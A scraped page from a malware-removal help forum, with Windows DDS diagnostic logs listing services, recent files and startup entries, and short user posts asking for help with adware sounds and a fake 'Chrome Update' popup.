S3 WpnUserService_48d4a;Windows Push Notifications User Service_48d4a;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-10-17 43520]
S4 AppVClient;Microsoft App-V Client;C:\WINDOWS\System32\AppVClient.exe [2016-10-17 823136]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S4 UevAgentDriver;UevAgentDriver;C:\WINDOWS\System32\drivers\UevAgentDriver.sys [2016-7-16 40288]
S4 UevAgentService;User Experience Virtualization Service;C:\WINDOWS\System32\AgentService.exe [2016-7-16 1227264]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2017-01-06 16:03:20 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{333BFE2C-DE51-4378-B70F-16527A639E60}\mpengine.dll
2017-01-04 16:27:58 11781064 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2016-12-16 15:18:13 -------- d-----w- C:\WINDOWS\LastGood.Tmp
2016-12-14 03:51:59 503808 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\Microsoft.Ink.dll
2016-12-10 00:21:39 98304 ----a-w- C:\WINDOWS\System32\browserbroker.dll
2016-12-10 00:20:59 91648 ----a-w- C:\WINDOWS\SysWow64\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll
2016-12-09 19:59:06 16279288 ----a-w- C:\WINDOWS\SysWow64\nvwgf2um.dll
2016-12-09 19:58:58 14046888 ----a-w- C:\WINDOWS\System32\nvopencl.dll
2016-12-09 19:58:54 11378672 ----a-w- C:\WINDOWS\SysWow64\nvopencl.dll
2016-12-09 19:58:50 17722448 ----a-w- C:\WINDOWS\System32\nvd3dumx.dll
2016-12-09 19:58:44 14634024 ----a-w- C:\WINDOWS\SysWow64\nvd3dum.dll
2016-12-09 19:58:40 13957376 ----a-w- C:\WINDOWS\System32\nvcuda.dll
2016-12-09 19:58:34 11315752 ----a-w- C:\WINDOWS\SysWow64\nvcuda.dll
2016-12-09 19:58:22 2856736 ----a-w- C:\WINDOWS\SysWow64\nvapi.dll
2016-12-09 19:46:16 31532728 ----a-w- C:\WINDOWS\System32\nvoglv64.dll
2016-12-09 19:45:58 24217784 ----a-w- C:\WINDOWS\SysWow64\nvoglv32.dll
2016-12-09 19:45:30 960576 ----a-w- C:\WINDOWS\System32\NvIFR64.dll
2016-12-09 19:45:30 923200 ----a-w- C:\WINDOWS\SysWow64\NvIFR.dll
2016-12-09 19:38:58 919104 ----a-w- C:\WINDOWS\System32\NvFBC64.dll
2016-12-09 19:38:56 885824 ----a-w- C:\WINDOWS\SysWow64\NvFBC.dll
2016-12-09 19:38:46 1917640 ----a-w- C:\WINDOWS\System32\nvdispco6434201.dll
2016-12-09 19:38:38 4262584 ----a-w- C:\WINDOWS\System32\nvcuvid.dll
2016-12-09 19:38:34 4004536 ----a-w- C:\WINDOWS\SysWow64\nvcuvid.dll
2016-12-09 19:37:20 15310400 ----a-w- C:\WINDOWS\SysWow64\nvcompiler.dll
2016-12-09 19:37:14 23009344 ----a-w- C:\WINDOWS\System32\nvcompiler.dll
2016-12-09 19:18:20 1566920 ----a-w- C:\WINDOWS\System32\nvdispgenco6434201.dll
2016-12-08 22:08:50 1167568 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4DA42AEE-36E8-4F07-BC3A-C5AED3CC748B}\gapaengine.dll
.
==================== Find3M ====================
.
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-09 23:49:51 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 19:59:12 18806712 ----a-w- C:\WINDOWS\System32\nvwgf2umx.dll
2016-12-09 19:58:26 3245408 ----a-w- C:\WINDOWS\System32\nvapi64.dll
2016-12-09 19:53:50 76864 ----a-w- C:\WINDOWS\SysWow64\opencl.dll
2016-12-09 19:45:46 12914360 ----a-w- C:\WINDOWS\System32\drivers\nvlddmkm.sys
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
.
============= FINISH: 8:44:31.37 ===============

Attached Files

attach.txt (12.3 KB)

↧

Crazy ad sound in background!

January 6, 2017, 4:55 pm

≫ Next: Chrome Update Malware

≪ Previous: Two Pesky Virus I cannot remove - Win.Trojan.Agent-5331045-0 HELP......

I know it's malware cause I got a message saying "abc can't run script" and I hear TV ads in the background. I ran MS Malicious software tool, Malwarebytes, Hitman and Zemana. Is there an easier way to fix this without all the steps on your site?

There were Trojans and all kind of bad stuff.

Thank you.

BTW it hijacked my Firefox and stuff but I got that back. But it's sooooo slooooww. It also hj my administrative but I got that back.

↧

Chrome Update Malware

January 7, 2017, 9:35 am

≫ Next: Windows Blue Screen

≪ Previous: Crazy ad sound in background!

I keep getting the "Chrome Update" malware tab popping up in the Chrome browser.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18538
Run by Steve at 12:30:18 on 2017-01-07
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8175.3925 [GMT -5:00]
.
AV: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: ESET NOD32 Antivirus 8.0 *Enabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\DbxSvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files (x86)\WinTV\TVServer\CaptureGenPCI.exe
C:\Program Files (x86)\WinTV\TVServer\CaptureGenPCI.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\VIA XHCI UASP Utility\usb3Monitor.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Users\Steve\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Users\Steve\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe
C:\Users\Steve\AppData\Roaming\Spotify\SpotifyWebHelper.exe
C:\Program Files\WinZip\FAH\FAHWindow64.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\system32\wuauclt.exe
C:\Program Files (x86)\KeePass\KeePass.exe
C:\Program Files (x86)\Quicken\qw.exe
C:\Program Files (x86)\Quicken\qwSubprocess.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Program Files (x86)\Mozilla Thunderbird\crashreporter.exe
C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Reader Link Helper: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
BHO: ContributeBHO Class: {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
TB: Contribute Toolbar: {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Adobe PDF: {182EC0BE-5110-49C8-A062-BEB1D02A220B} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
uRun: [Google Update] C:\Users\Steve\AppData\Local\Google\Update\1.3.32.7\GoogleUpdateCore.exe
uRun: [Google Photos Backup] "C:\Users\Steve\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe" /autostart
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [Epic Privacy Browser Installer] "C:\Users\Steve\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe" /c
uRun: [Spotify Web Helper] "C:\Users\Steve\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
uRun: [Spotify] "C:\Users\Steve\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe"
mRun: [Adobe_ID0EYTHM] C:\PROGRA~2\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\FAH.lnk - C:\Program Files\WinZip\FAH\FAHConsole.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Append to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{11312726-2811-493A-94BF-947DB1908C61} : DHCPNameServer = 172.20.10.1
TCP: Interfaces\{3868A159-2B54-4F78-A3E7-21682EEB7004} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [VIAxHCUtl] C:\Program Files\VIA XHCI UASP Utility\usb3Monitor
x64-Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2015-10-7 82240]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2015-10-7 42304]
R1 AppleCharger;AppleCharger;C:\Windows\System32\drivers\AppleCharger.sys [2015-10-7 22240]
R1 eamonm;eamonm;C:\Windows\System32\drivers\eamonm.sys [2015-7-13 255240]
R1 ZAM;ZAM Helper Driver;C:\Windows\System32\drivers\zam64.sys [2016-12-23 203680]
R1 ZAM_Guard;ZAM Guard Driver;C:\Windows\System32\drivers\zamguard64.sys [2016-12-23 203680]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-10-7 77104]
R2 DbxSvc;DbxSvc;C:\Windows\System32\DbxSvc.exe [2016-12-21 42096]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 ekrn;ESET Service;C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [2015-7-8 1353720]
R2 epfwwfpr;epfwwfpr;C:\Windows\System32\drivers\epfwwfpr.sys [2015-7-13 168208]
R2 HauppaugeTVServer;HauppaugeTVServer;C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [2015-10-8 586872]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2015-4-27 14624]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-10-7 410744]
R3 hcw89;hcw89 service;C:\Windows\System32\drivers\hcw89.sys [2015-10-8 1771904]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\drivers\LEqdUsb.sys [2009-6-17 74256]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\drivers\LHidEqd.sys [2009-6-17 13328]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2015-10-7 941272]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2015-10-7 58536]
R3 VUSB3HUB;VIA USB 3 Root Hub Service;C:\Windows\System32\drivers\ViaHub3.sys [2015-10-7 225792]
R3 xhcdrv;VIA USB eXtensible Host Controller Service;C:\Windows\System32\drivers\xhcdrv.sys [2015-10-7 305664]
S1 UsbCharger;UsbCharger;C:\Windows\System32\drivers\UsbCharger.sys [2015-10-7 22240]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-11-29 105144]
